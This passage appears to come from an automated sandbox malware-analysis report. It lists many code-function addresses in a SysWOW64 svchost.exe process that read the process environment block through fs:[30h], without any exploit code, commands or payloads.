                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h] 4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h] 4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A383C0 mov eax, dword ptr fs:[00000030h] 4_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB63C0 mov eax, dword ptr fs:[00000030h] 4_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AD43D4 mov eax, dword ptr fs:[00000030h] 4_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AD43D4 mov eax, dword ptr fs:[00000030h] 4_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A6A30B mov eax, dword ptr fs:[00000030h] 4_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A6A30B mov eax, dword ptr fs:[00000030h] 4_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A6A30B mov eax, dword ptr fs:[00000030h] 4_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A2C310 mov ecx, dword ptr fs:[00000030h] 4_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03A50310 mov ecx, dword ptr fs:[00000030h] 4_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AD437C mov eax, dword ptr fs:[00000030h] 4_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h] 4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB2349 mov eax, dword ptr fs:[00000030h]4_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov ecx, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB035C mov eax, dword ptr fs:[00000030h]4_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AFA352 mov eax, dword ptr fs:[00000030h]4_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD8350 mov ecx, dword ptr fs:[00000030h]4_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC62A0 mov eax, dword ptr fs:[00000030h]4_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E284 mov eax, dword ptr fs:[00000030h]4_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E284 mov eax, dword ptr fs:[00000030h]4_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0283 mov eax, dword ptr fs:[00000030h]4_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0283 mov eax, dword ptr fs:[00000030h]4_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB0283 mov eax, dword ptr fs:[00000030h]4_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A402E1 mov eax, dword ptr fs:[00000030h]4_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A402E1 mov eax, dword ptr fs:[00000030h]4_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A402E1 mov eax, dword ptr fs:[00000030h]4_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]4_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2823B mov eax, dword ptr fs:[00000030h]4_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34260 mov eax, dword ptr fs:[00000030h]4_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34260 mov eax, dword ptr fs:[00000030h]4_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34260 mov eax, dword ptr fs:[00000030h]4_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2826B mov eax, dword ptr fs:[00000030h]4_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AE0274 mov eax, dword ptr fs:[00000030h]4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB8243 mov eax, dword ptr fs:[00000030h]4_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB8243 mov ecx, dword ptr fs:[00000030h]4_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A250 mov eax, dword ptr fs:[00000030h]4_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36259 mov eax, dword ptr fs:[00000030h]4_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A70185 mov eax, dword ptr fs:[00000030h]4_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEC188 mov eax, dword ptr fs:[00000030h]4_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AEC188 mov eax, dword ptr fs:[00000030h]4_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD4180 mov eax, dword ptr fs:[00000030h]4_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD4180 mov eax, dword ptr fs:[00000030h]4_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB019F mov eax, dword ptr fs:[00000030h]4_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A197 mov eax, dword ptr fs:[00000030h]4_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A197 mov eax, dword ptr fs:[00000030h]4_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A197 mov eax, dword ptr fs:[00000030h]4_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B061E5 mov eax, dword ptr fs:[00000030h]4_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A601F8 mov eax, dword ptr fs:[00000030h]4_2_03A601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF61C3 mov eax, dword ptr fs:[00000030h]4_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF61C3 mov eax, dword ptr fs:[00000030h]4_2_03AF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]4_2_03AAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A60124 mov eax, dword ptr fs:[00000030h]4_2_03A60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov ecx, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov eax, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov eax, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ADA118 mov eax, dword ptr fs:[00000030h]4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF0115 mov eax, dword ptr fs:[00000030h]4_2_03AF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov ecx, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC4144 mov eax, dword ptr fs:[00000030h]4_2_03AC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C156 mov eax, dword ptr fs:[00000030h]4_2_03A2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC8158 mov eax, dword ptr fs:[00000030h]4_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36154 mov eax, dword ptr fs:[00000030h]4_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A36154 mov eax, dword ptr fs:[00000030h]4_2_03A36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC80A8 mov eax, dword ptr fs:[00000030h]4_2_03AC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF60B8 mov eax, dword ptr fs:[00000030h]4_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]4_2_03AF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3208A mov eax, dword ptr fs:[00000030h]4_2_03A3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_03A2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A380E9 mov eax, dword ptr fs:[00000030h]4_2_03A380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB60E0 mov eax, dword ptr fs:[00000030h]4_2_03AB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]4_2_03A2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A720F0 mov ecx, dword ptr fs:[00000030h]4_2_03A720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB20DE mov eax, dword ptr fs:[00000030h]4_2_03AB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2A020 mov eax, dword ptr fs:[00000030h]4_2_03A2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A2C020 mov eax, dword ptr fs:[00000030h]4_2_03A2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AC6030 mov eax, dword ptr fs:[00000030h]4_2_03AC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4000 mov ecx, dword ptr fs:[00000030h]4_2_03AB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD2000 mov eax, dword ptr fs:[00000030h]4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E016 mov eax, dword ptr fs:[00000030h]4_2_03A4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5C073 mov eax, dword ptr fs:[00000030h]4_2_03A5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32050 mov eax, dword ptr fs:[00000030h]4_2_03A32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB6050 mov eax, dword ptr fs:[00000030h]4_2_03AB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A307AF mov eax, dword ptr fs:[00000030h]4_2_03A307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AD678E mov eax, dword ptr fs:[00000030h]4_2_03AD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A527ED mov eax, dword ptr fs:[00000030h]4_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A527ED mov eax, dword ptr fs:[00000030h]4_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A527ED mov eax, dword ptr fs:[00000030h]4_2_03A527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]4_2_03ABE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A347FB mov eax, dword ptr fs:[00000030h]4_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A347FB mov eax, dword ptr fs:[00000030h]4_2_03A347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]4_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB07C3 mov eax, dword ptr fs:[00000030h]4_2_03AB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C720 mov eax, dword ptr fs:[00000030h]4_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C720 mov eax, dword ptr fs:[00000030h]4_2_03A6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6273C mov eax, dword ptr fs:[00000030h]4_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6273C mov ecx, dword ptr fs:[00000030h]4_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6273C mov eax, dword ptr fs:[00000030h]4_2_03A6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAC730 mov eax, dword ptr fs:[00000030h]4_2_03AAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C700 mov eax, dword ptr fs:[00000030h]4_2_03A6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30710 mov eax, dword ptr fs:[00000030h]4_2_03A30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A60710 mov eax, dword ptr fs:[00000030h]4_2_03A60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A38770 mov eax, dword ptr fs:[00000030h]4_2_03A38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40770 mov eax, dword ptr fs:[00000030h]4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6674D mov esi, dword ptr fs:[00000030h]4_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6674D mov eax, dword ptr fs:[00000030h]4_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6674D mov eax, dword ptr fs:[00000030h]4_2_03A6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A30750 mov eax, dword ptr fs:[00000030h]4_2_03A30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03ABE75D mov eax, dword ptr fs:[00000030h]4_2_03ABE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72750 mov eax, dword ptr fs:[00000030h]4_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72750 mov eax, dword ptr fs:[00000030h]4_2_03A72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB4755 mov eax, dword ptr fs:[00000030h]4_2_03AB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]4_2_03A6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A666B0 mov eax, dword ptr fs:[00000030h]4_2_03A666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34690 mov eax, dword ptr fs:[00000030h]4_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A34690 mov eax, dword ptr fs:[00000030h]4_2_03A34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03AAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB06F1 mov eax, dword ptr fs:[00000030h]4_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB06F1 mov eax, dword ptr fs:[00000030h]4_2_03AB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]4_2_03A6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4E627 mov eax, dword ptr fs:[00000030h]4_2_03A4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A66620 mov eax, dword ptr fs:[00000030h]4_2_03A66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A68620 mov eax, dword ptr fs:[00000030h]4_2_03A68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A3262C mov eax, dword ptr fs:[00000030h]4_2_03A3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AAE609 mov eax, dword ptr fs:[00000030h]4_2_03AAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4260B mov eax, dword ptr fs:[00000030h]4_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A72619 mov eax, dword ptr fs:[00000030h]4_2_03A72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF866E mov eax, dword ptr fs:[00000030h]4_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AF866E mov eax, dword ptr fs:[00000030h]4_2_03AF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A660 mov eax, dword ptr fs:[00000030h]4_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A660 mov eax, dword ptr fs:[00000030h]4_2_03A6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A62674 mov eax, dword ptr fs:[00000030h]4_2_03A62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A4C640 mov eax, dword ptr fs:[00000030h]4_2_03A4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB05A7 mov eax, dword ptr fs:[00000030h]4_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB05A7 mov eax, dword ptr fs:[00000030h]4_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03AB05A7 mov eax, dword ptr fs:[00000030h]4_2_03AB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A545B1 mov eax, dword ptr fs:[00000030h]4_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A545B1 mov eax, dword ptr fs:[00000030h]4_2_03A545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32582 mov eax, dword ptr fs:[00000030h]4_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A32582 mov ecx, dword ptr fs:[00000030h]4_2_03A32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A64588 mov eax, dword ptr fs:[00000030h]4_2_03A64588
